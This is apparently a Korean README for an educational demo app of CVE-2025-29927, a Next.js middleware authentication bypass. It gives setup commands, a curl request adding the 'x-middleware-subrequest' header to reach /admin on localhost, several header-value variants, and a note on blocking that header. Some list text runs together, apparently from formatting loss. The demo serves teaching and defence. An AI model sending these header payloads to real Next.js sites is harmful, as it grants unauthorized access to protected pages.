
🔓 Next.js Auth Bypass Demo - CVE-2025-29927 미들웨어 인증 우회 취약점을 시연하는 교육용 애플리케이션입니다. ⚠️ 교육 목적으로만 사용하십시오. [AI를 사용하여 제작됨]
Next.js 12.2의 간단한 개념 증명 애플리케이션입니다.
npm install
npm run dev
애플리케이션은 http://localhost:3000에서 확인할 수 있습니다.
npm run dev - 개발 서버 시작npm run build - 프로덕션 빌드npm run start - 프로덕션 서버 시작pages/index.js를 편집하여 Hello World 페이지를 수정하세요. 애플리케이션은 단순성을 위해 인라인 스타일을 사용하지만 필요에 따라 CSS 파일이나 스타일링 라이브러리를 추가할 수 있습니다.
이 애플리케이션은 Rachid.A (zhero)와 Yasser Allam (inzo_)이 발견한 CVE-2025-29927 취약점을 시연합니다:
x-middleware-subrequest 헤더를 사용한 완전한 미들웨어 우회adminadminx-middleware-subrequest: middleware 헤더 추가curl -H "x-middleware-subrequest: middleware" http://localhost:3000/adminx-middleware-subrequest: middlewarex-middleware-subrequest: src/middlewarex-middleware-subrequest: middleware:middleware:middleware:middleware:middlewarex-middleware-subrequest 헤더 차단⚠️ 경고: 이는 교육 목적으로 실제 CVE를 시연한 것입니다!
이 애플리케이션은 단순성을 위해 인라인 스타일을 사용합니다. 프로덕션 앱의 경우 다음을 고려하세요:
즐거운 코딩하세요! 🚀